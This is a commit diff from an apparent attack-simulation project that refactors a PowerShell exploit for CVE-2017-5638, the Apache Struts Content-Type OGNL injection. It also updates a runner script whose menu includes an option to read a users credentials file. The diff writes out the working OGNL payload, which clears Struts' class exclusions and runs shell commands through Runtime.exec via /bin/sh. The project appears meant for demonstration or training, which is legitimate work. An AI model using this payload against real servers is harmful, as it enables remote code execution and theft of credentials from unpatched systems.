refactor(script): update exploit script execution method

Author: AIPEAC

simulation/attack-script/exploit_cve_2017_5638.ps1

@@ -218,22 +218,22 @@ if ($DiagLevel -gt 0) {
     #        setMemberAccess to DEFAULT_MEMBER_ACCESS (allows static method calls
     #        like getResponse()).  DEFAULT_MEMBER_ACCESS is a static FIELD, not a
     #        method, so it is accessible even with allowStaticMethodAccess=false.
-    #   6. Runtime.exec(String) runs the command via cmd.exe.  We use a single
-    #        string (not ProcessBuilder) because OGNL's constructor resolution can
-    #        struggle with ProcessBuilder(List) vs ProcessBuilder(String[]).
+    #   6. Runtime.exec(String[]) runs the command via /bin/sh.  We use a String
+    #        array form so the shell receives the command as a single token — the
+    #        single-string overload uses StringTokenizer which would split on spaces
+    #        and break commands like 'cat data/users.yaml' into separate arguments.
     #   7. waitFor() ensures the process exits; readAllBytes() drains stdout.
     #   8. Write output bytes via getOutputStream() + setContentLength +
     #      flushBuffer() to commit the response before JSP rendering.
     #
     $escapedCmd = $Command -replace "'", "''"
-    $escapedCmd = $escapedCmd -replace '\\', '\\' # double backslashes for OGNL escape sequences
     $contentType = ".%{" +
         "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +
         "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +
         "(#ognlUtil.getExcludedPackageNames().clear())." +
         "(#ognlUtil.getExcludedClasses().clear())." +
         "(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))." +
-        "(#process=@java.lang.Runtime@getRuntime().exec('cmd.exe /c $escapedCmd'))." +
+        "(#process=@java.lang.Runtime@getRuntime().exec(new String[]{'/bin/sh','-c','$escapedCmd'}))." +
         "(#process.waitFor())." +
         "(#out=new java.lang.String(#process.getInputStream().readAllBytes(),'UTF-8'))." +
         "(#response=@org.apache.struts2.ServletActionContext@getResponse())." +

simulation/attack-script/run.ps1

@@ -10,22 +10,22 @@ While ($true) {
     switch ($s.Trim()) {
         '0' {
             Write-Host "Running in safe demo mode...`n"
-            .\exploit_cve_2017_5638.ps1 -DemoMode
+            & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -DemoMode
         }
         '1' {
             Write-Host "Running with whoami command...`n"
-            .\exploit_cve_2017_5638.ps1 -Command "whoami"
+            & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command "whoami"
         }
         'a' {
             Write-Host "Running attack script - exfiltrating user credentials...`n"
-            .\exploit_cve_2017_5638.ps1 -Command "type data\users.yaml"
+            & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command "cat data/users.yaml"
         }
         'd' {
             Write-Host "`n=== DIAGNOSTIC: Running levels 1-6 ===" -ForegroundColor Magenta
             Write-Host "Each level adds one step. First failure reveals the problem.`n" -ForegroundColor Magenta
             for ($lvl = 1; $lvl -le 9; $lvl++) {
                 Write-Host "--- Diagnostic level $lvl ---" -ForegroundColor Magenta
-                .\exploit_cve_2017_5638.ps1 -DiagLevel $lvl
+                & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -DiagLevel $lvl
                 Write-Host ""
             }
         }

simulation/backend/run.ps1

@@ -1,2 +1,7 @@
-mvn tomcat7:run
+Push-Location $PSScriptRoot
+try {
+    mvn tomcat7:run
+} finally {
+    Pop-Location
+}
 Read-Host "Enter to exit"